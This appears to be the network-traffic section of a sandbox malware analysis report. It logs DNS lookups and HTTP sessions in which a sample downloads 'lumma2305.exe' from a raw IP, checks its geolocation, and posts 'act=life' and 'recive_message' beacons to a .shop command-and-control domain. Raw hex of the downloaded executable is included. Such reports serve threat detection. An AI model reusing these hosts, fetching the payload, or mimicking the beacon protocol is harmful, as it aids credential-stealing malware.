May 24, 2024 00:22:31.846801043 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:31.846860886 CEST	49756	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.208081007 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.208116055 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.208353996 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.208688974 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.208698034 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.723961115 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.724052906 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.725409031 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.725418091 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.726176977 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.727421045 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.728132963 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.728173018 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.728509903 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.728543997 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.728693962 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.728841066 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.728962898 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.728987932 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.729119062 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729149103 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.729295969 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729321957 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729351044 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.729495049 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729527950 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729559898 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.729736090 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729774952 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.729793072 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.764369011 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.764523029 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.764564991 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.764573097 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.764621019 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.764816046 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:32.764844894 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.764880896 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:32.784543037 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:35.140809059 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:35.140928030 CEST	443	49757	188.114.96.3	192.168.2.6
May 24, 2024 00:22:35.141069889 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:35.141304970 CEST	49757	443	192.168.2.6	188.114.96.3
May 24, 2024 00:22:35.141323090 CEST	443	49757	188.114.96.3	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 00:21:55.480066061 CEST	54605	53	192.168.2.6	1.1.1.1
May 24, 2024 00:21:55.486927986 CEST	53	54605	1.1.1.1	192.168.2.6
May 24, 2024 00:21:56.209896088 CEST	49512	53	192.168.2.6	1.1.1.1
May 24, 2024 00:21:56.319633961 CEST	53	49512	1.1.1.1	192.168.2.6
May 24, 2024 00:22:03.499118090 CEST	65237	53	192.168.2.6	1.1.1.1
May 24, 2024 00:22:03.513581991 CEST	53	65237	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 00:21:55.480066061 CEST	192.168.2.6	1.1.1.1	0x95c	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
May 24, 2024 00:21:56.209896088 CEST	192.168.2.6	1.1.1.1	0xd06	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
May 24, 2024 00:22:03.499118090 CEST	192.168.2.6	1.1.1.1	0x7c62	Standard query (0)	employhabragaomlsp.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 24, 2024 00:21:55.486927986 CEST	1.1.1.1	192.168.2.6	0x95c	No error (0)	ipinfo.io	34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 00:21:56.319633961 CEST	1.1.1.1	192.168.2.6	0xd06	No error (0)	db-ip.com	104.26.5.15	A (IP address)	IN (0x0001)	false
May 24, 2024 00:21:56.319633961 CEST	1.1.1.1	192.168.2.6	0xd06	No error (0)	db-ip.com	172.67.75.166	A (IP address)	IN (0x0001)	false
May 24, 2024 00:21:56.319633961 CEST	1.1.1.1	192.168.2.6	0xd06	No error (0)	db-ip.com	104.26.4.15	A (IP address)	IN (0x0001)	false
May 24, 2024 00:22:03.513581991 CEST	1.1.1.1	192.168.2.6	0x7c62	No error (0)	employhabragaomlsp.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 00:22:03.513581991 CEST	1.1.1.1	192.168.2.6	0x7c62	No error (0)	employhabragaomlsp.shop	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

https:

ipinfo.io

db-ip.com

employhabragaomlsp.shop

5.42.65.116

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	5.42.65.116	80	3108	C:\Users\user\Desktop\tMO4FVIc9l.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 00:22:01.363991976 CEST	219	OUT	HEAD /lumma2305.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 5.42.65.116 Cache-Control: no-cache
May 24, 2024 00:22:02.021457911 CEST	155	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 468480 Date: Thu, 23 May 2024 22:22:01 GMT Server: Python/3.12 aiohttp/3.9.5
May 24, 2024 00:22:02.023130894 CEST	218	OUT	GET /lumma2305.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 5.42.65.116 Cache-Control: no-cache
May 24, 2024 00:22:02.268306971 CEST	155	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 468480 Date: Thu, 23 May 2024 22:22:02 GMT Server: Python/3.12 aiohttp/3.9.5
May 24, 2024 00:22:02.268743038 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$I/\|\|\|}\|}\|}\|}\|\|V\|l}\|l}\|l}@\|o}\|o}\|Rich\|PE
May 24, 2024 00:22:02.269654036 CEST	1236	IN	Data Raw: af 41 00 e8 d1 36 00 00 8b 5d 08 33 ff 8b c7 89 45 e8 ff 75 0c e8 42 7e 00 00 59 8b c8 89 4d e4 8b 03 8b 40 04 8b 74 18 20 8b 44 18 24 3b c7 7c 16 7f 0e 3b f7 76 10 3b c7 7c 0c 7f 04 3b f1 76 06 2b f1 1b c7 eb 0e 0f 57 c0 66 0f 13 45 dc 8b 45 e0 Data Ascii: A6]3EuB~YM@t D$;\|;v;\|;v+WfEEuESM(}uj^}AD%@t<E;\|3;v-HD@PL8tsuEEEAL8WuuP$;EuE;uAE;\|3;v-H
May 24, 2024 00:22:02.270967960 CEST	1236	IN	Data Raw: 03 00 00 8b 44 24 10 5f 5e 89 03 8b c3 5d 5b 59 c2 10 00 e8 50 06 00 00 cc 56 8b 74 24 0c 57 8b 7c 24 14 57 56 ff 74 24 14 e8 e1 fd ff ff 2b 74 24 18 83 c4 0c c1 fe 02 8d 04 b7 5f 5e c3 56 57 ff 74 24 0c 8b f1 33 c0 8b fe ab ab ab ab 83 66 10 00 Data Ascii: D$_^][YPVt$W\|$WVt$+t$_^VWt$3ff_^VW3D$ffxvpQ_^VWt$3ffxYPt$v_^VWt$3t$ffN_^T$
May 24, 2024 00:22:02.270982981 CEST	1236	IN	Data Raw: ee 2b ce 3b d1 77 0c 8d 04 16 3b 44 24 08 0f 42 44 24 08 5e c2 04 00 56 8b f1 83 3e 00 74 12 8b 46 08 2b 06 83 e0 fc 50 ff 36 e8 2e f9 ff ff 59 59 8b 4c 24 08 8b 44 24 0c 89 0e 8d 04 81 89 46 04 8b 44 24 10 8d 04 81 89 46 08 5e c2 0c 00 55 8b ec Data Ascii: +;w;D$BD$^V>tF+P6.YYL$D$FD$F^U/G3E}$VutW<AW?tYPWMH_MUuRP}EuGEMP!MEPMM3^+jAT,eH\|1u*D1
May 24, 2024 00:22:02.273716927 CEST	896	IN	Data Raw: 08 8b f1 89 75 fc e8 5b f8 ff ff c7 06 28 d2 41 00 8b c6 5e c9 c2 04 00 55 8b ec 56 8b f1 8d 46 04 c7 06 c8 d1 41 00 50 e8 a6 38 00 00 f6 45 08 01 59 74 0a 6a 0c 56 e8 79 27 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8 Data Ascii: u[(A^UVFAP8EYtjVy'YY^]UMuihOBEP8UMuhOBEPn8<UMA9t=xAuA]@]Uu>vYu2]E]UuEPxYY]UUS
May 24, 2024 00:22:02.273730040 CEST	1236	IN	Data Raw: 14 89 5e 18 89 5e 1c 89 5e 20 89 5e 24 89 5e 28 89 5e 2c 89 5e 30 e8 ea 23 00 00 8b f8 59 85 ff 74 10 6a 01 89 5d fc e8 d3 18 00 00 59 89 47 04 eb 02 8b fb 8b ce 89 7e 34 e8 c5 08 00 00 8b c6 e8 0c 24 00 00 c3 cc cc cc cc cc 55 8b ec 83 ec 14 8b Data Ascii: ^^^ ^$^(^,^0#Ytj]YG~4$UESVW]CEPA{Y_^[V5?G=G?GWt@T0<?G?Gt@T<_^jA#u3SB]^^^^3^fF
May 24, 2024 00:22:02.276160002 CEST	1236	IN	Data Raw: 08 01 74 0a 6a 50 56 e8 55 1f 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 7b fd ff ff f6 45 08 01 74 0a 6a 38 56 e8 33 1f 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 d0 de 41 00 74 0a 6a 08 56 e8 10 1f 00 00 59 Data Ascii: tjPVUYY^]UV{Etj8V3YY^]UEVAtjVYY^]UVAhEAtjVYY^]UEVAtjVYY^]UjhAdPV/G3PEdeV$AfEYtj8VrYY
May 24, 2024 00:22:02.276173115 CEST	948	IN	Data Raw: cc cc cc 55 8b ec 56 57 8b 7d 08 8b f1 8b cf e8 25 01 00 00 84 c0 74 06 83 66 38 00 eb 0a 8b ce 89 7e 38 e8 33 ff ff ff 5f 5e 5d c2 04 00 83 79 4c 00 74 09 ff 71 4c e8 72 64 00 00 59 c3 c2 00 00 55 8b ec 8b 45 0c 39 45 08 74 18 8b 51 14 83 fa 0f Data Ascii: UVW}%tf8~83_^]yLtqLrdYUE9EtQvPuRQ]AQvPRPQWyA<9uQPVqT+AA,0^_UQSVWG_<;tG,OPOGTGGG,_^[UMhQ
May 24, 2024 00:22:02.276181936 CEST	1236	IN	Data Raw: 8b 70 1c 8d 45 d0 50 8d 45 fc 8b ce 50 8d 45 dc 50 8d 45 cc 50 8d 45 d9 50 8d 45 d8 50 8d 47 40 50 ff 15 40 d1 41 00 8b 4d d4 ff d6 83 e8 00 74 21 83 e8 01 74 1c 48 83 e8 01 75 43 ff 77 4c ff 75 d8 e8 ac ef ff ff 59 59 84 c0 75 2e 83 cb ff eb 29 Data Ascii: pEPEPEPEPEPEPG@P@AMt!tHuCwLuYYu.)uE+twLVjPq;uEG=9Et^M_3[XUS]VFt)F9s"tA;uF,FC#@~Lt7t2~8uvLQtY
May 24, 2024 00:22:02.278719902 CEST	1236	IN	Data Raw: ec 0f 76 03 8b 4d d8 8b 75 e8 8b 45 d0 2b f0 03 f1 85 f6 7e 19 ff 73 4c 4e 0f be 04 06 50 e8 84 70 00 00 59 59 85 f6 7e 05 8b 45 d0 eb e7 0f b6 7d d7 8d 4d d8 e8 b0 e6 ff ff 8b c7 e8 f4 11 00 00 c3 56 57 8b f9 8b 07 8b 70 18 8b ce ff 15 40 d1 41 Data Ascii: vMuE+~sLNPpYY~E}MVWp@A;tG,OB_^WGtG,;s_SVp@A;tSp@A^[_jAoq0M}eEPYu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	34.117.186.192	443	3108	C:\Users\user\Desktop\tMO4FVIc9l.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:21:56 UTC	237	OUT	GET /widget/demo/8.46.123.175 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-23 22:21:56 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 23 May 2024 22:21:56 GMT content-type: application/json; charset=utf-8 Content-Length: 1028 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-23 22:21:56 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 Data Ascii: { "input": "8.46.123.175", "data": { "ip": "8.46.123.175", "hostname": "static-cpe-8-46-123-175.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Lev
2024-05-23 22:21:56 UTC	152	IN	Data Raw: 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: "email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	104.26.5.15	443	3108	C:\Users\user\Desktop\tMO4FVIc9l.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:21:56 UTC	261	OUT	GET /demo/home.php?s=8.46.123.175 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-23 22:21:57 UTC	658	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:21:56 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: A29E9AFD:7C20_93878F2E:0050_664FC184_EDB3B77:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2Fbw%2FJDmaKiGhvFUU52TMNWmY2xSuQ78iM8tRfZoiZpO0Fc4%2FRsA5EZr%2FmvpFM9A1CXhAKeKyGw5cM66rdi91tJRpu%2FCZOwoR7tz51e8vt8U3tBUKXFOLcfmlw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888711ed8254400-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:21:57 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-23 22:21:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:04 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: employhabragaomlsp.shop
2024-05-23 22:22:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-23 22:22:04 UTC	816	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jvapbbtugt02fq4e80317niqgp; expires=Mon, 16-Sep-2024 16:08:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uytpTN60m0PhonO%2Fx7L3xxOiLXFAKHRPq0WM8%2BC6P4FHEiQ9F5ijVPXRwySXZS31ntozhLyCScLh97s9XQm5wUk%2FaWbjIDlBNRSaCEO3OECArt%2Fn1qPKrULasy%2BaZzjbGUAk8lDJREBLrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888714bca41c337-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-23 22:22:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49716	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:04 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: employhabragaomlsp.shop
2024-05-23 22:22:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-23 22:22:05 UTC	818	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=grr13j99ahf08btc36ekc45tuh; expires=Mon, 16-Sep-2024 16:08:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RRlOIO5r9qI7yvFWHntLGhW0cccdMKQsMqul%2FH4b%2BsT3TjGBt67rkLOyTWw315pQiCzIaJ%2FLKmcmyDsS9%2F7sEAx1WAfg8hYHVI31POxLkywbB%2BPdDA944oabo1VhRH7eX%2FvmkuRNo9TzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871502b521778-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-23 22:22:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49717	188.114.96.3	443	4340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:04 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: employhabragaomlsp.shop
2024-05-23 22:22:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-23 22:22:05 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=agh5mqlcru3kj58nsas0igr8lj; expires=Mon, 16-Sep-2024 16:08:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTsqFZoQuLbYMANHZbECcVly7yMy8MhrJ5zeQAeZByosQNSfQTvpYQ%2Bc966bTMEsWhlSlF5WwBpKo3so2aNu8lgicG%2Bgo3XLJgLbpDKPo87I4vzTmxZ8bUKddDyFq2uQx2ct7DhbEp4l1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887150caa372ad-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-23 22:22:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49718	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:05 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: employhabragaomlsp.shop
2024-05-23 22:22:05 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-23 22:22:05 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ehl97rrkdcivoj4th5qanamfl3; expires=Mon, 16-Sep-2024 16:08:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfWNlBmCjq2D3mrAZXnYkY4TT87M50TI3dIpC3plz%2FnhtwyPmCiwqlpT7ucG4yR4ycxG1PJxU4fR2LEOJqcAulnz91JAJ7H%2Faqc3qICkZ8T6t6vmKG08wMZsI09SCsfkIXygRnIMuOYzMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887153680842fe-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:05 UTC	559	IN	Data Raw: 31 66 62 30 0d 0a 2f 64 48 56 6b 67 46 73 63 33 5a 32 72 7a 43 4b 64 44 39 54 33 70 71 73 42 4e 46 58 71 6f 75 68 78 34 79 70 56 57 66 53 38 4c 32 47 32 39 79 77 64 30 35 4a 56 6b 4b 44 4f 6f 4e 57 54 44 62 38 6f 49 78 77 6f 79 4c 50 70 36 76 4f 72 73 67 78 52 65 6a 51 32 35 79 39 70 76 63 74 5a 6e 70 55 47 39 63 53 73 46 52 6b 57 64 66 68 70 67 33 59 64 63 2f 6c 67 2f 32 73 69 79 49 43 73 4a 58 46 69 62 53 37 34 57 67 44 48 54 59 62 79 6b 54 72 47 56 34 67 74 62 54 46 61 2f 4e 37 6f 49 4b 6f 35 65 6e 54 64 31 33 79 30 76 43 59 70 62 54 66 59 42 38 59 56 46 71 6c 4f 59 4e 57 57 69 66 38 6f 49 77 6d 6a 58 58 61 36 74 4f 6d 34 64 6f 4a 52 65 69 4c 34 64 2b 34 6f 66 64 7a 44 51 63 66 47 63 46 44 31 6c 59 46 5a 65 36 71 6e 44 54 68 4b 6f 69 42 71 4c 71 47 6f Data Ascii: 1fb0/dHVkgFsc3Z2rzCKdD9T3pqsBNFXqouhx4ypVWfS8L2G29ywd05JVkKDOoNWTDb8oIxwoyLPp6vOrsgxRejQ25y9pvctZnpUG9cSsFRkWdfhpg3Ydc/lg/2siyICsJXFibS74WgDHTYbykTrGV4gtbTFa/N7oIKo5enTd13y0vCYpbTfYB8YVFqlOYNWWif8oIwmjXXa6tOm4doJReiL4d+4ofdzDQcfGcFD1lYFZe6qnDThKoiBqLqGo
